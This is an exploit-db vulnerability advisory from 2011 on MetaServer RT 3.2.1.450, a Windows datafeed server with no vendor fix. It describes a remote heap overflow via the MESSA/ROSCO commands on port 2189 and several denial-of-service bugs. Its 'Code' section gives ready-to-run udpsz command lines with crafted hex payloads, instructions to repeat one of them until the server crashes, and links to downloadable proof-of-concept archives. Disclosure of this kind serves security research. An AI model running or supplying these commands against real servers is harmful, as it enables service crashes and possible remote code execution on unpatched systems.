MetaServer RT 3.2.1.450 – Multiple Vulnerabilities

  • Author: Luigi Auriemma
    Date: 2011-09-21
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17879/
  • #######################################################################
    
     Luigi Auriemma
    
    Application:MetaServer RT
    http://www.traderssoft.com/ts/msrt/
    Versions: <= 3.2.1.450
    Platforms:Windows
    Bugs: A] heap overflow
    B] various Denials of Service
    Exploitation: remote
    Date: 19 Sep 2011
    Author: Luigi Auriemma
    e-mail: aluigi@autistici.org
    web:aluigi.org
    
    
    #######################################################################
    
    
    1) Introduction
    2) Bugs
    3) The Code
    4) Fix
    
    
    #######################################################################
    
    ===============
    1) Introduction
    ===============
    
    
    From vendor's website:
    "MetaServer RT allows to use MetaStock 6.52/7.x/8.x/9.x/10.x/11.x
    (eSignal version) and TradeStartion2000i/ProSuite2000i with datafeeds
    that are not supported originally."
    
    
    #######################################################################
    
    =======
    2) Bugs
    =======
    
    
    The program listens on ports 2189, 2192 and 2194.
    
    ----------------
    A] heap overflow
    ----------------
    
    Through an interrupted connection with multiple packets on port 2189
    and a subsequent reconnection it's possible to cause a heap overflow
    and the relative write4.
    Both the "MESSA" and "ROSCO" commands can be used.
    
    
    -----------------------------
    B] various Denials of Service
    -----------------------------
    
    Various invalid memory accesses and freezing of the program.
    
    
    #######################################################################
    
    ===========
    3) The Code
    ===========
    
    
    http://aluigi.org/testz/udpsz.zip
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17879.zip
    
    A]
     udpsz -C "cdab0000 00000000 ffff0000 00000000 ffffffff 524f53434f" -l 0 -T -1 SERVER 2189 0xffff
    
     stop after at least 50 dots and relaunch the command again till the
     crashing of the server during a memcpy.
    
    
    B]
    udpsz -b 0x80 -T SERVER 2194 1000
    udpsz -C "cdab0000 00000000 00ffffff 00000000 00000000 524f53434f" -T SERVER 2189 -1
    ...others...
    
    
    #######################################################################
    
    ======
    4) Fix
    ======
    
    
    No fix.
    
    
    #######################################################################